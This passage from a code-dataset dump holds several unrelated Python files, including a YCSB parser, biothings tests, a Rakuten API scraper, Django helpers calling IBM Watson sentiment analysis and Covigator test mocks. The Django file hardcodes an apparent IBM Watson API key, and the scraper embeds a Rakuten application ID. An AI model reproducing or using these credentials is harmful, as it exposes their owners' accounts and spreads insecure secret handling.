all\t\n\t\t\tinput_particle = cms.vstring(\"1:11\",\"1:13\",\"1:22\",\"2:15\")\n\t\t\t)\n\nprocess.TFileService = cms.Service(\n \"TFileService\", fileName=cms.string(\"myoutput.root\"))\n\nif doPat:\n\tprocess.p = cms.Path(process.patDefaultSequence+process.myevents+process.myelectrons+process.mymuons+process.myphotons+process.myjets+process.mymets+process.mytaus+process.mytrigEvent)\nelse: process.p = cms.Path(process.selectedHadronsAndPartons * process.jetFlavourInfosAK5PFJets * process.myevents+process.myelectrons+process.mymuons+process.myphotons+process.myjets+process.mymets+process.mytaus+process.mytrigEvent)\n","sub_path":"PhysObjectExtractor/python/poet_cfg.py","file_name":"poet_cfg.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198095683","text":"from os import walk\nfrom markovchain import JsonStorage\nfrom markovchain.text import MarkovText, ReplyMode\nimport random\n\nmarkov = MarkovText()\n\npeople = ['Marnie', 'Gaz', 'Chloe', 'Nathan', 'Greg']\nlines = []\nfiles = []\nfor (dirpath, dirnames, filenames) in walk(\"scripts/\"):\n files.extend(filenames)\n break\n\nfor file in files:\n fo = open(f\"scripts/{file}\", \"r\")\n line = fo.readline()\n while line:\n lines.append(line)\n line = fo.readline()\n fo.close()\n\nfor line in lines:\n markov.data(line)\n\nfor i in range(0,20):\n print(f'{people[random.randrange(0, len(people), 1)]}:{markov(max_length=16, reply_mode=ReplyMode.END)}')\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"425214138","text":"#!/usr/bin/python\nimport argparse\nimport logging\nimport joblib\nimport os\n\nfrom pytools.ycsb.ycsb import PARSED_FILE_EXTENSION, load_ycsb_parsed_2_df, \\\n convert_df_column_ms2datetime, load_ycsb_raw_2_df, skip_df_head\n\nlogging.basicConfig(\n format=\"(%(funcName).10s):[%(lineno)4d] %(asctime)s %(levelname)7s| %(message)s\",\n datefmt='%H:%M:%S', level=logging.DEBUG)\n\n\ndef get_parsed_ycsb_df(src_file_name, is_input_preparsed, is_consider_siblings):\n \"\"\" Function returns a parsed df from the ycsb\"\"\"\n\n if is_input_preparsed:\n logging.info(\"Input set as 'pre-parsed', reading parsed...\")\n return load_ycsb_parsed_2_df(src_file_name)\n\n if is_consider_siblings:\n siblings_name = \"%s.%s\" % (src_file_name, PARSED_FILE_EXTENSION)\n if os.path.isfile(siblings_name):\n logging.info(\"Found sibling [%s] reading it as parsed...\", siblings_name)\n return load_ycsb_parsed_2_df(siblings_name)\n\n logging.info(\"Reading & parsing [%s] ...\", src_file_name)\n return load_ycsb_raw_2_df(src_file_name)\n\n\n\ndef _parse_ycsb_single_file(\n src_file, is_input_preparsed, skip_first_samples_min, is_consider_siblings):\n\n # <1.> get parsed dataframe\n df = get_parsed_ycsb_df(src_file, is_input_preparsed, is_consider_siblings)\n\n\n # <2.> convert timestamp column\n logging.info(\"Converting timestamp to date time format...[%s]\", src_file)\n df = convert_df_column_ms2datetime(df, \"timestamp_ms\", \"datetimestamp\")\n\n\n # <3.> skip head of the dataframe if needed\n if skip_first_samples_min > 0:\n df = skip_df_head(df, skip_first_samples_min, timestamp_column=\"datetimestamp\")\n\n return df\n\ndef parse_ycsb_file_list(\n file_list, is_input_preparsed, skip_first_samples_min, is_consider_siblings, n_jobs=-1):\n\n tasks = (\n joblib.delayed(_parse_ycsb_single_file)(\n 
src_file, is_input_preparsed, skip_first_samples_min, is_consider_siblings)\n for src_file in file_list\n )\n return joblib.Parallel(n_jobs=n_jobs, verbose=50)(tasks)\n\n\ndef get_default_arguments():\n\n parser = argparse.ArgumentParser(add_help=False)\n\n parser.add_argument(\"--skip_first_samples_min\", default=0, type=int,\n help=\"Option to skip front samples, that can be associated with warm up time.\")\n\n parser.add_argument(\"--target_latency_slo_us\", default=30000, type=int,\n help=\"If set, will compute SLO violations per file and add it into the title\")\n\n parser.add_argument('--pre_parsed_input', action='store_true', default=False,\n help=\"\"\"Indicates that the input files (.ycsb or any other extension) are already pre-parsed\n and can be read directly into a dataframe without additional Raw parsing procedure\"\"\")\n\n\n parser.add_argument('--consider_siblings',\n help=\"\"\"If a target file, has a sibling with \".%s\" extension, the script will use the\n sibling file and will consider it as it is already parsed. Note, skip_first_samples_min is\n not applied in this case\"\"\" % PARSED_FILE_EXTENSION , action='store_true')\n\n\n return parser\n\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser = argparse.ArgumentParser(\"\"\"Reads a list of .ycsb files and parses them in accordance\n to the configuration\"\"\",\n parents=[ycsb.get_default_arguments()],\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n FLAGS = parser.parse_args()\n file_list = ycsb.get_source_files(FLAGS, flatten=True)\n\n parse_ycsb_file_list(\n file_list, FLAGS.pre_parsed_input, FLAGS.skip_first_samples_min, FLAGS.consider_siblings,\n n_jobs=-1)\n","sub_path":"Phase_2/pytools-master/ycsb/parsing/parse_ycsb_file_list.py","file_name":"parse_ycsb_file_list.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"573496677","text":"gifts = [\n (\"Partridge in a Pear Tree.\", \"and a\"),\n (\"Turtle Doves\", \"two\"),\n (\"French Hens\", \"three\"),\n (\"Calling Birds\", \"four\"),\n (\"Gold Rings\", \"five\"),\n (\"Geese-a-Laying\", \"six\"),\n (\"Swans-a-Swimming\", \"seven\"),\n (\"Maids-a-Milking\", \"eight\"),\n (\"Ladies Dancing\", \"nine\"),\n (\"Lords-a-Leaping\", \"ten\"),\n (\"Pipers Piping\", \"eleven\"),\n (\"Drummers Drumming\", \"twelve\")\n]\nnum_in_word = (\"first\", \"second\", \"third\", \"fourth\", \"fifth\", \"sixth\",\n\"seventh\", \"eighth\", \"ninth\", \"tenth\", \"eleventh\", \"twelfth\")\n\ndef sing():\n return verses(1, 12)\n \ndef verse(num):\n if num == 1:\n verse = on_the_nth_day(0) + \", a \" + gifts[0][0] + \"\\n\" \n return verse\n return _verse(num) + \"\\n\"\n\ndef verses(start,end):\n return \"\\n\".join([verse(n) for n in range(start,end+1)]) + \"\\n\"\n\ndef _verse(end):\n verse = on_the_nth_day(end - 1)\n bag = [verse,]\n end = end - 1\n for gift in gifts[end::-1]:\n bag.append(gift[1] + \" \" + gift[0])\n return \", \".join(bag)\n\ndef on_the_nth_day(n):\n return \"On the \" + num_in_word[n] + \" day of Christmas my true love gave to me\"\n","sub_path":"all_data/exercism_data/python/twelve-days/1cd8538dee7c463eb3490541a6f5bced.py","file_name":"1cd8538dee7c463eb3490541a6f5bced.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"374739790","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 2 13:18:45 
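The `joblib.delayed`/`Parallel` pair used in `parse_ycsb_file_list` above builds lazy task descriptors first and only then fans them out to workers. A self-contained sketch of the same pattern, assuming only that `joblib` is installed:

```python
import joblib

def square(x):
    # Stand-in for _parse_ycsb_single_file: any picklable function works.
    return x * x

# delayed() wraps each call into a (func, args, kwargs) descriptor;
# Parallel then executes the descriptors across worker processes.
tasks = (joblib.delayed(square)(i) for i in range(8))
print(joblib.Parallel(n_jobs=2)(tasks))  # [0, 1, 4, 9, 16, 25, 36, 49]
```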
2021\r\n\r\n@author: BHUVI\r\n\"\"\"\r\n\r\nimport numpy as np\r\nsome_dict = {'a': 1, 'b': 2, 'c': 3}\r\nfor key in some_dict:\r\n print(key)\r\n ","sub_path":"python/numpy_iterable.py","file_name":"numpy_iterable.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"242914087","text":"\"\"\"\nTests for initial changes to SEQD.query Function\n\"\"\"\n\nfrom biothings_explorer.user_query_dispatcher import SingleEdgeQueryDispatcher\nimport unittest\n\nclass TestSEQD(unittest.TestCase):\n\n # test filter by node degrees\n def test_node_deg(self):\n filter = {'name':'NodeDegree', 'count':30}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 31)\n for node,y in seqd.G.nodes(data=True):\n if node != 'NCBIGene:1017':\n self.assertEqual('NodeDegree', y['filteredBy'])\n\n # test filter by apis\n def test_api(self):\n filter = {'name':'UniqueAPIs'}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n for node,y in seqd.G.nodes(data=True):\n if node != 'NCBIGene:1017':\n self.assertEqual('UniqueAPIs', y['filteredBy'])\n\n # test filter by CoOccurrence\n def test_co_occur(self):\n filter = {'name':'CoOccurrence', 'count':60}\n seqd = SingleEdgeQueryDispatcher(input_cls='Disease',\n output_cls='Disease',\n input_id='MESH',\n values='D000755',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 61)\n for node,y in seqd.G.nodes(data=True):\n if node != 'MESH:D000755':\n self.assertEqual('CoOccurrence', y['filteredBy'])\n\n # test with labels\n def test_label_T(self):\n filter = {'name':'EdgeLabel', 'count':60, 'label':'related_to'}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 61)\n for x in seqd.G.edges.data():\n self.assertEqual(filter['label'], x[2]['label'])\n\n # with no label given\n def test_label_F(self):\n filter = {'name':'EdgeLabel', 'count':60}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 859)\n\n # test no filter given\n def test_no_filter(self):\n filter = {}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 859)\n\n # test with no count given (default to 50)\n def test_no_count(self):\n filter = {'name':'NodeDegree'}\n seqd = SingleEdgeQueryDispatcher(input_cls='Gene',\n output_cls='ChemicalSubstance',\n input_id='NCBIGene',\n values='1017',\n filter=filter)\n seqd.query()\n self.assertEqual(seqd.G.number_of_nodes(), 51)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_filters/test_seqd.py","file_name":"test_seqd.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"480753987","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport json\n\n# Calling API\n\ndriver = 
webdriver.PhantomJS() # without UI\n#driver = webdriver.Firefox() # with UI\n\nurls = [\n \"https://app.rakuten.co.jp/services/api/Product/Search/20140305?applicationId=1046974398995068359&format=json&keyword=4549387740759\",\n \"https://app.rakuten.co.jp/services/api/Product/Search/20140305?applicationId=1046974398995068359&format=json&keyword=24M45VQ-B\"\n]\n\nfor url in urls:\n driver.get(url)\n\n data = driver.page_source\n\n # http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser\n # lxml is faster than html.parser\n #parsed = BeautifulSoup(data, \"html.parser\")\n parsed = BeautifulSoup(data, \"lxml\")\n\n # String to Dictionary\n data_json = json.loads(parsed.get_text())\n print(data_json.__class__)\n print(data_json)\n","sub_path":"data/python/multiple_calls_api.py","file_name":"multiple_calls_api.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"173048653","text":"# Orange || Apple\nfrom sklearn import tree\n\n# [weight(g), texture(Bumpy/Smooth)] \n\nfeatures = [[140,1],[130,1],[150,0],[170,0]]\nlabels \t = [0, 0, 1, 1]\n\n# features + labels = training set\n\nclf = tree.DecisionTreeClassifier() # create new DecisionTree\n\nclf = clf.fit(features, labels) # train the model using the training set\n\n\nif clf.predict([[150,0]]) == 0 : # predict the best answer\n\tprint(\"Apple!\")\nelse:\n\tprint(\"Orange!\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"623090716","text":"import httpretty\nimport json\nimport unittest\n\nfrom unittest import TestCase\n\nfrom pir_client.client import pir_api_client, InvalidChoice\n\n\nOPTIONS_DATA = {\n \"actions\": {\n \"POST\": {\n \"country\": {\n \"choices\": [\n {\n \"value\": \"AF\",\n \"display_name\": \"Afghanistan\"\n },\n ]\n },\n\n \"market\": {\n \"choices\": [\n {\n \"value\": \"africa\",\n \"display_name\": \"africa\"\n },\n {\n \"value\": \"canada\",\n \"display_name\": \"canada\"\n }\n ]\n },\n \"sector\": {\n \"choices\": [\n {\n \"value\": \"tech\",\n \"display_name\": \"Technology\"\n },\n {\n \"value\": \"automotive\",\n \"display_name\": \"Automotive\"\n },\n ]\n }\n }\n }\n}\n\n\nclass APIClientTestCase(TestCase):\n def setUp(self):\n httpretty.enable()\n httpretty.register_uri(\n httpretty.OPTIONS, \"http://none/api/pir/\",\n body=json.dumps(OPTIONS_DATA)\n )\n\n httpretty.register_uri(\n httpretty.POST, \"http://none/api/pir/\",\n )\n\n def tearDown(self):\n httpretty.disable()\n\n def test_post(self):\n\n res = pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'market': 'africa',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n self.assertIsInstance(res, object)\n\n with self.assertRaises(InvalidChoice):\n pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'market': 'not a market',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n with self.assertRaises(InvalidChoice):\n pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'country': 'not a country',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n with self.assertRaises(InvalidChoice):\n pir_api_client.create_report({\n 'name': 'test',\n 'sector': 'tech',\n 'country': 'AF',\n 'market': 'africa',\n 'company': 'Rollo',\n 'email': 'rollokb@gmail.com'\n })\n\n\nif __name__ == '__main__':\n 
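The four-sample fruit classifier a little above is the canonical `DecisionTreeClassifier` hello-world; here is the same fit/predict flow in compact, runnable form (scikit-learn assumed installed):

```python
from sklearn import tree

# Features: [weight (g), texture (1 = bumpy, 0 = smooth)]
features = [[140, 1], [130, 1], [150, 0], [170, 0]]
labels = [0, 0, 1, 1]  # mirroring the original: 0 -> "Apple!", 1 -> "Orange!"

clf = tree.DecisionTreeClassifier().fit(features, labels)
print("Orange!" if clf.predict([[160, 0]])[0] == 1 else "Apple!")
```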
unittest.main()\n","sub_path":"pir_client/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"496849475","text":"import requests\nimport json\nfrom .models import CarDealer, DealerReview\nfrom requests.auth import HTTPBasicAuth\n\n\n# Create a `get_request` to make HTTP GET requests\ndef get_request(url, **kwargs):\n try:\n api_key = None\n if 'api_key' in kwargs:\n params = {\n 'text': kwargs['text'],\n 'version': '2021-03-25',\n 'features': 'sentiment',\n 'return_analyzed_text': True\n }\n api_key = kwargs['api_key']\n response = requests.get(url, headers={'Content-Type':'application/json'}, params=params, auth=HTTPBasicAuth('apikey', api_key))\n else:\n response = requests.get(url, headers={'Content-Type':'application/json'}, params=kwargs)\n status_code = response.status_code\n if status_code == 200:\n json_data = json.loads(response.text)\n return json_data\n else:\n print('get_requestResponse Status Code = ', status_code)\n return None\n except Exception as e:\n print('Error occurred', e)\n return None\n\n# Create a `post_request` to make HTTP POST requests\ndef post_request(url, json_payload, **kwargs):\n try:\n headers = { 'Content-Type': 'application/json'}\n response= requests.request(\"POST\", url, headers=headers, data=json_payload)\n\n status_code = response.status_code\n if status_code == 200:\n json_data = json.loads(response.text)\n return json_data\n else:\n print('Response Status Code = ', status_code)\n return None\n except Exception as e:\n print('Error occurred', e)\n return None\n\n# Create a get_dealers_from_cf method to get dealers from a cloud function\ndef get_dealers_from_cf(url, **kwargs):\n results = []\n # Call get_request with a URL parameter\n json_result = get_request(url)\n if json_result:\n # Get the row list in JSON as dealers\n\n dealers = json_result[\"entries\"]\n # For each dealer object\n for dealer in dealers:\n # Create a CarDealer object with values in `doc` object\n dealer_obj = CarDealer(address=dealer[\"address\"], city=dealer[\"city\"], full_name=dealer[\"full_name\"],\n id=dealer[\"id\"], lat=dealer[\"lat\"], long=dealer[\"long\"],\n short_name=dealer[\"short_name\"],\n st=dealer[\"st\"], zip=dealer[\"zip\"])\n results.append(dealer_obj)\n\n return results\n\n# Create a get_dealer_reviews_from_cf method to get reviews by dealer id from a cloud function\ndef get_dealer_reviews_from_cf(url):\n results=[]\n # call get_request with a URL parameter\n json_result = get_request(url)\n if json_result:\n reviews = json_result[\"review\"]\n for review in reviews:\n try:\n Sentiment=analyze_review_sentiments(review[\"review\"])\n \n except:\n Sentiment=\"neutral\"\n \n\n if review[\"purchase\"]==True:\n review_obj = DealerReview(id=review[\"id\"],dealership=review[\"dealership\"],name=review[\"name\"],purchase=review[\"purchase\"],\n review=review[\"review\"],purchase_date=review[\"purchase_date\"],car_make=review[\"car_make\"],car_model=review[\"car_model\"],\n car_year=review[\"car_year\"], sentiment=Sentiment)\n else:\n review_obj = DealerReview(id=review[\"id\"],dealership=review[\"dealership\"],name=review[\"name\"],purchase=review[\"purchase\"],\n review=review[\"review\"],purchase_date=review[\"review_time\"],car_make=\"NONE\",car_model=\"NONE\",\n car_year=\"NONE\", sentiment=Sentiment)\n results.append(review_obj)\n return results\n\n# Create an `analyze_review_sentiments` method to call Watson NLU 
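The `get_request` helper being defined just below follows a common shape: send the GET, branch on the status code, and parse JSON only on 200. A stripped-down sketch of that shape — the URL in the usage comment is a placeholder, not a real endpoint:

```python
import requests

def get_json(url, **params):
    """Minimal GET helper: returns parsed JSON on 200, else None."""
    response = requests.get(
        url, headers={"Content-Type": "application/json"}, params=params
    )
    if response.status_code == 200:
        return response.json()
    print("get_json failed with status", response.status_code)
    return None

# Usage (placeholder URL):
# dealers = get_json("https://api.example.com/dealers", state="TX")
```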
and analyze text\ndef analyze_review_sentiments(text):\n kwargs = {\n 'text': text,\n 'api_key': \"z43HCKRN1IlZiUWnzyZoo-FNTS3C8OWHCNSnYT7fzhTk\"\n }\n url = \"https://api.eu-gb.natural-language-understanding.watson.cloud.ibm.com/instances/2e32f983-6289-46d9-82b8-608e601d2005\"\n result = get_request(url + '/v1/analyze', **kwargs)\n return result['sentiment']['document']['label']\n\n","sub_path":"server/djangoapp/restapis.py","file_name":"restapis.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"21462908","text":"\n\nfrom xai.brain.wordbase.nouns._enchantress import _ENCHANTRESS\n\n#calss header\nclass _ENCHANTRESSES(_ENCHANTRESS, ):\n\tdef __init__(self,): \n\t\t_ENCHANTRESS.__init__(self)\n\t\tself.name = \"ENCHANTRESSES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"enchantress\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_enchantresses.py","file_name":"_enchantresses.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"641064372","text":"import numpy as np\nfrom itertools import combinations\nfrom typing import Union\nfrom faker import Faker\nfrom sqlalchemy.orm import Session\n\nfrom covigator import MISSENSE_VARIANT, INFRAME_INSERTION, INFRAME_DELETION\nfrom covigator.database.model import SampleEna, DataSource, JobStatus, Log, CovigatorModule, Variant, \\\n VariantCooccurrence, VariantType, SampleCovid19Portal, VariantCovid19Portal\nfrom Bio.Alphabet.IUPAC import IUPACData\n\nfrom covigator.database.queries import Queries\n\nMOCKED_GENES = [\"S\", \"N\", \"E\", \"M\", \"ORF3a\", \"ORF1ab\", \"ORF7b\", \"ORF10\", \"ORF6\", \"ORF8\", \"ORF7a\"]\nMOCKED_DOMAINS = [\"CoV_S2\", \"bCoV_S1_RBD\", \"bCoV_S1_N\", \"CoV_S1_C\"]\nMOCKED_LINEAGES = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"\"]\n\n\ndef get_mocked_variant(faker: Faker, chromosome=None, gene_name=None, source=DataSource.ENA.name, session: Session = None) -> Variant:\n\n if gene_name is None:\n gene_name = faker.random_choices(MOCKED_GENES, length=1)[0]\n domain_name = faker.random_choices(MOCKED_DOMAINS, length=1)[0]\n annotation = faker.random_choices(\n [MISSENSE_VARIANT, INFRAME_DELETION, INFRAME_INSERTION], length=1)[0] #SYNONYMOUS_VARIANT\n\n if session:\n queries = Queries(session=session)\n gene = queries.get_gene(gene_name=gene_name)\n start = gene.start\n end = gene.end\n else:\n start = 1\n end = 30000\n\n klass = Queries.get_variant_klass(source)\n reference = faker.random_choices(list(IUPACData.unambiguous_dna_letters), length=1)[0]\n alternate = faker.random_choices(list(IUPACData.unambiguous_dna_letters), length=1)[0]\n variant = klass(\n chromosome=chromosome if chromosome else faker.bothify(text=\"chr##\"),\n position=faker.random_int(min=start, max=end),\n reference=reference,\n # TODO: reference and alternate could be equal!\n alternate=alternate,\n variant_type=VariantType.SNV,\n gene_name=gene_name,\n hgvs_p=\"p.{}{}{}\".format(\n faker.random_choices(list(IUPACData.protein_letters_1to3.values()), length=1)[0],\n faker.random_int(min=1, max=500),\n faker.random_choices(list(IUPACData.protein_letters_1to3.values()), length=1)[0]\n ),\n annotation=annotation,\n annotation_highest_impact=annotation,\n pfam_name=domain_name,\n length=len(reference) - len(alternate)\n )\n variant.variant_id = variant.get_variant_id()\n return variant\n\n\ndef get_mocked_variant_observation(\n sample: 
Union[SampleEna, SampleCovid19Portal], variant: Union[Variant, VariantCovid19Portal], faker=Faker()):\n\n klass = Queries.get_variant_observation_klass(\n DataSource.ENA.name if isinstance(sample, SampleEna) else DataSource.COVID19_PORTAL.name)\n return klass(\n sample=sample.run_accession if sample else faker.unique.uuid4(),\n variant_id=variant.variant_id,\n chromosome=variant.chromosome,\n position=variant.position,\n reference=variant.reference,\n alternate=variant.alternate,\n variant_type=VariantType.SNV,\n annotation=variant.annotation,\n annotation_highest_impact=variant.annotation_highest_impact,\n gene_name=variant.gene_name,\n pfam_name=variant.pfam_name,\n date=faker.date_time(),\n hgvs_p=variant.hgvs_p,\n length=len(variant.reference) - len(variant.alternate)\n )\n\n\ndef get_mocked_sample(faker: Faker, source: DataSource =DataSource.ENA, job_status=JobStatus.FINISHED) -> Union[SampleEna]:\n identifier = faker.unique.uuid4()\n sample = SampleEna(\n run_accession=identifier,\n collection_date=faker.date_time(),\n country=faker.country(),\n fastq_ftp=faker.uri(),\n fastq_md5=faker.md5(),\n num_fastqs=1,\n status=job_status,\n pangolin_lineage=faker.random_choices(MOCKED_LINEAGES, length=1)[0]\n )\n return sample\n\n\ndef get_mocked_ena_sample(faker: Faker, job_status=JobStatus.FINISHED) -> SampleEna:\n return get_mocked_sample(faker=faker, source=DataSource.ENA, job_status=job_status)\n\n\ndef get_mocked_log(faker: Faker, source: DataSource = None, module: CovigatorModule = None) -> Log:\n return Log(\n start=faker.date_time(),\n end=faker.date_time(),\n source=source if source else faker.random_choices((DataSource.ENA, DataSource.GISAID), length=1)[0],\n module=module if module else faker.random_choices((CovigatorModule.ACCESSOR, CovigatorModule.PROCESSOR),\n length=1)[0],\n has_error=faker.boolean(),\n processed=faker.random_digit(),\n data={\"included\": faker.random_digit(),\n \"excluded\": {\"this\": faker.random_digit(), \"that\": faker.random_digit()}}\n )\n\n\ndef get_mocked_variant_cooccurrence(faker: Faker, variant_one: Variant, variant_two: Variant) -> VariantCooccurrence:\n if variant_one.position <= variant_two.position:\n cooccurrence = VariantCooccurrence(\n variant_id_one=variant_one.variant_id,\n variant_id_two=variant_two.variant_id,\n count=faker.random_int(min=1, max=10)\n )\n else:\n cooccurrence = VariantCooccurrence(\n variant_id_two=variant_one.variant_id,\n variant_id_one=variant_two.variant_id,\n count=faker.random_int(min=1, max=10)\n )\n return cooccurrence\n\n\ndef mock_samples_and_variants(faker, session: Session, num_samples=10, source = DataSource.ENA):\n\n existing_variants = set()\n samples = mock_samples(faker=faker, session=session, num_samples=num_samples, source=source)\n # introduce some not finished samples, which happen to have variants too...\n failed_samples = mock_samples(faker=faker, session=session, num_samples=num_samples, source=source,\n job_status=JobStatus.FAILED_PROCESSING)\n # introduce a variant that is shared by all samples (eg: like 23403:A>G)\n shared_variant = get_mocked_variant(faker=faker, source=source.name, session=session)\n for sample in samples + failed_samples:\n variants = [get_mocked_variant(faker=faker, source=source.name, session=session) for _ in range(9)] + \\\n [shared_variant]\n # NOTE: this aims at removing potentially repeated variants\n variants_dict = {v.variant_id: v for v in variants}\n variants = variants_dict.values()\n new_variants = list(filter(lambda x: x.variant_id not in existing_variants, 
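The mock factories in this module lean heavily on Faker; one detail worth showing in isolation is seeding, which makes the generated samples reproducible across test runs. A minimal sketch, assuming Faker 4+ (for the `unique` proxy):

```python
from faker import Faker

Faker.seed(42)   # class-level seed -> deterministic output across runs
faker = Faker()

print(faker.unique.uuid4())             # unique id, as used for run_accession
print(faker.country())                  # random country name
print(faker.random_int(min=1, max=10))  # as in the cooccurrence counts
print(faker.date_time())                # as in collection_date
```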
variants))\n session.add_all(new_variants)\n session.commit()\n existing_variants.update([v.variant_id for v in variants])\n\n variants_observations = [get_mocked_variant_observation(faker=faker, variant=v, sample=sample)\n for v in variants]\n session.add_all(variants_observations)\n session.commit()\n\n\ndef mock_samples(faker, session: Session, num_samples=10, job_status=JobStatus.FINISHED, source=DataSource.ENA):\n samples = []\n for _ in range(num_samples):\n sample = get_mocked_ena_sample(faker=faker, job_status=job_status)\n samples.append(sample)\n\n session.add_all(samples)\n session.commit()\n return samples\n\n\ndef mock_cooccurrence_matrix(faker, session: Session):\n # add some variants belonging to two genes\n chromosome = \"fixed_chromosome\"\n gene_name = \"S\"\n variants = [get_mocked_variant(faker=faker, chromosome=chromosome, gene_name=gene_name) for _ in range(5)]\n other_gene_name = \"N\"\n other_variants = [get_mocked_variant(faker=faker, chromosome=chromosome, gene_name=other_gene_name) for _\n in range(5)]\n session.add_all(variants + other_variants)\n session.commit()\n # adds some cooccurrences\n cooccurrences = []\n other_cooccurrences = []\n variants_to_sample = {\"{}-{}\".format(v1.hgvs_p, v2.hgvs_p): (v1, v2) for v1, v2 in\n list(combinations(variants, 2))}\n other_variants_to_sample = {\"{}-{}\".format(v1.hgvs_p, v2.hgvs_p): (v1, v2) for v1, v2 in\n list(combinations(other_variants, 2))}\n combined_variants_to_sample = {\"{}-{}\".format(v1.hgvs_p, v2.hgvs_p): (v1, v2) for v1, v2 in\n list(zip(variants, other_variants))}\n for variant in variants + other_variants:\n cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant, variant))\n for (variant_one, variant_two) in [variants_to_sample.get(k) for k in\n np.random.choice(list(variants_to_sample.keys()), 5, replace=False)]:\n cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant_one, variant_two))\n for (variant_one, variant_two) in [other_variants_to_sample.get(k) for k in\n np.random.choice(list(other_variants_to_sample.keys()), 5, replace=False)]:\n other_cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant_one, variant_two))\n for (variant_one, variant_two) in [combined_variants_to_sample.get(k) for k in\n np.random.choice(list(combined_variants_to_sample.keys()), 5,\n replace=False)]:\n other_cooccurrences.append(get_mocked_variant_cooccurrence(faker, variant_one, variant_two))\n session.add_all(cooccurrences + other_cooccurrences)\n session.commit()\n\n # add some samples to compute the frequency right\n mock_samples(faker=faker, session=session, num_samples=10)\n\n return other_variants, variants\n","sub_path":"covigator/tests/unit_tests/mocked.py","file_name":"mocked.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337505806","text":"# coding=utf-8\n\n\ndef task(keys, vals):\n \"\"\"\n Функция принимает два списка/кортежа ключей и значений:\n (k1, k2, ..., kn) и (v1, v2, ..., vm).\n\n Вернуть словарь вида {k1: v1, k2: v2, ...}.\n Если ключей больше чем значений, лишним ключам назначаются значения None.\n\n Примеры:\n >>> task(['a', 'b', 'c'], [1, 2, 3])\n {'a': 1, 'b': 2, 'c': 3}\n\n >>> task(['a', 'b', 'c', 'd', 'e'], [1, 2, 3])\n {'a': 1, 'b': 2, 'c': 3, 'd': None, 'e': None}\n \"\"\"\n # BEGIN\n none = (None,)\n cc = len(keys)\n dd = len(vals)\n if cc > dd:\n ee = cc - dd\n vals.extend(none * ee)\n new_dict = dict(zip(keys, vals))\n else:\n new_dict = 
